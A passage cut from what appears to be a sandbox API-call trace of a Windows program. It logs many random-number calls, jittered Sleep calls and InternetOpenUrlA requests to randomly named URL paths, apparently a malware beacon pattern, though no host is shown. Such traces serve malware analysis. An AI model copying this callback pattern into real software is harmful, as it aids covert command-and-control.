cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0245.645] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0245.645] Sleep (dwMilliseconds=0x10315) [0245.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0245.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.813] GetProcessHeap () returned 0x440000 [0245.813] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e70 [0245.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e71, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x4f4e71) returned 0x0 [0245.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.969] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.969] GetProcessHeap () returned 0x440000 [0245.969] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0245.969] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0245.969] lstrcatA (in: lpString1="\x81\x03", lpString2="/gloeWs2Qa1kugDcvfcly4bxmn7Zfm9f6fpnfYxcsyjpP/" | out: lpString1="\x81\x03/gloeWs2Qa1kugDcvfcly4bxmn7Zfm9f6fpnfYxcsyjpP/") returned="\x81\x03/gloeWs2Qa1kugDcvfcly4bxmn7Zfm9f6fpnfYxcsyjpP/" [0245.969] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0245.969] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/gloeWs2Qa1kugDcvfcly4bxmn7Zfm9f6fpnfYxcsyjpP/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0245.969] GetProcessHeap () returned 0x440000 [0245.969] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0245.969] GetProcessHeap () returned 0x440000 [0245.969] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e70 | out: hHeap=0x440000) returned 1 [0245.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0245.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0245.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0245.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0245.970] Sleep (dwMilliseconds=0x14629) [0246.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0246.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.186] GetProcessHeap () returned 0x440000 [0246.186] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f59f0 [0246.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f59f1, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4f59f1) returned 0x0 [0246.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.190] GetProcessHeap () returned 0x440000 [0246.190] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0246.190] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0246.190] lstrcatA (in: lpString1="\x81\x03", lpString2="/m7q29T0sp44229xDS8gYsV4gsa30o/" | out: lpString1="\x81\x03/m7q29T0sp44229xDS8gYsV4gsa30o/") returned="\x81\x03/m7q29T0sp44229xDS8gYsV4gsa30o/" [0246.191] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0246.191] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/m7q29T0sp44229xDS8gYsV4gsa30o/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0246.191] GetProcessHeap () returned 0x440000 [0246.191] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0246.191] GetProcessHeap () returned 0x440000 [0246.191] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f59f0 | out: hHeap=0x440000) returned 1 [0246.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0246.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0246.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0246.191] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0246.191] Sleep (dwMilliseconds=0x16a94) [0246.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0246.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.323] GetProcessHeap () returned 0x440000 [0246.323] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5770 [0246.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5771, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4f5771) returned 0x0 [0246.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.328] GetProcAddress 